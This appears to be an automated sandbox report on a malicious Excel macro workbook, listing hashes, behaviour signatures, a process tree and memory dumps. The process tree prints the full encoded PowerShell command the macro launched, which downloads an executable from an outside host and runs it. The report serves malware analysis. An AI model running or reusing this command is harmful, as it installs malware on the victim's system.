Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03-02-2024 09:10

General

  • Target

    8bf30500afdf9639a9b8d42c98f14106.xlsm

  • Size

    41KB

  • MD5

    8bf30500afdf9639a9b8d42c98f14106

  • SHA1

    642f4ab8d4de4fe4c60a14213e80a2d40dcdd659

  • SHA256

    ac8cc142c04fb014322b9247988a565775f598237e8664d9ae133afee7ab15a4

  • SHA512

    b628470911b9999cf9d50bd54deada781f2cb3e7c54476fc6ad41d4c7f53e10aa902d77d3cda4110ce7e11a8e078fef6d4117c64fb333d0598e3a6b3b57191f8

  • SSDEEP

    768:6f6JbfxjUurZN0DGCfkyX3eks4pSGn0Qic3q9M8NRKh3:C67fGzfPeUv02kM8N2

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8bf30500afdf9639a9b8d42c98f14106.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2936
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA==
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2776

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2936-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2936-1-0x000000007292D000-0x0000000072938000-memory.dmp

    Filesize

    44KB

  • memory/2936-57-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-113-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-124-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-166-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-198-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-241-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-275-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-317-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-360-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-394-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-392-0x000000007292D000-0x0000000072938000-memory.dmp

    Filesize

    44KB

  • memory/2936-438-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-440-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-487-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-485-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-516-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-518-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-564-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-592-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-651-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-684-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-721-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-749-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-805-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-839-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-881-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-883-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-928-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-930-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-981-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-982-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-983-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-984-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-989-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-991-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1026-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1028-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1092-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1094-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1130-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1131-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1133-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1171-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1173-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1175-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1226-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1230-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1232-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1234-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1228-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1276-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1278-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1280-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1314-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1315-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1317-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1357-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1359-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1394-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1392-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1437-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1439-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1441-0x0000000005CD0000-0x0000000005DD0000-memory.dmp

    Filesize

    1024KB

  • memory/2936-1494-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB